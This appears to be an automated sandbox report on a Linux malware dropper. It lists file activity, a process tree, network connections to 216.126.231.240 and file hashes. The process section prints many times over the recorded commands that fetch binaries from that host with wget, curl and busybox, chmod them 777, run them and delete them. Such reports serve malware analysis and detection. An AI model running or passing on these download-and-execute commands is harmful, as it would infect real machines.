File opened for modification /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /usr/bin/curl N/A
File opened for modification /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /usr/bin/curl N/A
File opened for modification /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /usr/bin/curl N/A
File opened for modification /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /usr/bin/curl N/A
File opened for modification /tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4 /usr/bin/curl N/A
File opened for modification /tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O /usr/bin/curl N/A
File opened for modification /tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J /usr/bin/curl N/A
File opened for modification /tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx /usr/bin/curl N/A
File opened for modification /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /usr/bin/curl N/A
File opened for modification /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /usr/bin/curl N/A
File opened for modification /tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0 /usr/bin/curl N/A
File opened for modification /tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE /usr/bin/curl N/A
File opened for modification /tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ /usr/bin/curl N/A
File opened for modification /tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0 /usr/bin/curl N/A
File opened for modification /tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m /usr/bin/curl N/A
File opened for modification /tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB /usr/bin/curl N/A
File opened for modification /tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC /usr/bin/curl N/A
File opened for modification /tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q /usr/bin/curl N/A
File opened for modification /tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz /usr/bin/curl N/A

Processes

/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh

[/tmp/7c1cb2103abab262f1065b8069cacdf70c6a26d41e286e6b7906dc9b70629918.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/chmod

[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m

[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/rm

[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/wget

[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/chmod

[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J

[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/rm

[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/wget

[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/chmod

[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O

[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/rm

[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/wget

[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/chmod

[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB

[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/rm

[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/wget

[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/chmod

[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O

[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/rm

[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/wget

[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/chmod

[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz

[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/rm

[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/wget

[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/chmod

[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE

[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/rm

[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/wget

[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/chmod

[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx

[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/rm

[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/usr/bin/wget

[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/chmod

[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4

[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/rm

[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/wget

[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/chmod

[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC

[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/rm

[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/wget

[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/chmod

[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ

[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/rm

[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/chmod

[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q

[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/rm

[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/wget

[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/chmod

[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0

[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/rm

[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/wget

[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/chmod

[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0

[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/rm

[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/wget

[wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/chmod

[chmod 777 SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/tmp/SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC

[./SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/bin/rm

[rm SQktCevJpk5dhjkcqzqBJTvtKdorD47CMC]

/usr/bin/wget

[wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/chmod

[chmod 777 RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/tmp/RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ

[./RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/bin/rm

[rm RFqGeAwFhfavhHr2KbtyU8XmmLxZQj98FQ]

/usr/bin/wget

[wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/chmod

[chmod 777 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/tmp/2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q

[./2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/bin/rm

[rm 2HzBwfEXrMArvqaIhOJ20QVULu1cqmXT5q]

/usr/bin/wget

[wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/chmod

[chmod 777 w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/tmp/w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0

[./w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/bin/rm

[rm w5thn0AuyzspzYJ4RUvFVFRVBkIsz5o4D0]

/usr/bin/wget

[wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/chmod

[chmod 777 EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/tmp/EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0

[./EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/bin/rm

[rm EPqkXJ1iTK3luMUeN5OmcnlhkYgGA4Brj0]

/usr/bin/wget

[wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/chmod

[chmod 777 A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m

[./A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/bin/rm

[rm A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m]

/usr/bin/wget

[wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/chmod

[chmod 777 NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/tmp/NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J

[./NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/bin/rm

[rm NXhHAGYkMUxtpLztKYcBM4mpB5T9qPPR3J]

/usr/bin/wget

[wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/chmod

[chmod 777 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/tmp/84zJEHmamaz9O6V7VhaGDFe0W865iMc59O

[./84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/bin/rm

[rm 84zJEHmamaz9O6V7VhaGDFe0W865iMc59O]

/usr/bin/wget

[wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/chmod

[chmod 777 zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/tmp/zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB

[./zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/bin/rm

[rm zW87e5c6aH2F8rqb0yul6w9V18uHPCHIYB]

/usr/bin/wget

[wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/chmod

[chmod 777 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/tmp/8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4

[./8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/bin/rm

[rm 8tOEbgnGZD7NJGDBJKZPVbHJsm92B5OPq4]

/usr/bin/wget

[wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/chmod

[chmod 777 vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/tmp/vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O

[./vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/bin/rm

[rm vM6yXERkrkBAzeulbmz0voJENwQXQ2ja6O]

/usr/bin/wget

[wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/chmod

[chmod 777 GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/tmp/GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz

[./GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/bin/rm

[rm GRiGtAsqDfR1jyDbYHpKzH8b0UN5Gk9yIz]

/usr/bin/wget

[wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/chmod

[chmod 777 lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/tmp/lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE

[./lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/bin/rm

[rm lIaAGg82Vr6GeXKmHiv4lELympxeGoFdvE]

/usr/bin/wget

[wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/usr/bin/curl

[curl -O http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/busybox

[/bin/busybox wget http://216.126.231.240/bins/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/chmod

[chmod 777 UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/tmp/UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx

[./UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

/bin/rm

[rm UuR0umvGhqJ9EUAAvWU1B7gSmRnCXxIJNx]

Network

Country Destination Domain Proto
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp
US 216.126.231.240:80 216.126.231.240 tcp

Files

/tmp/A1jA1OAA7tsFrtT29PRmQVtG8eNviMBJ3m

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97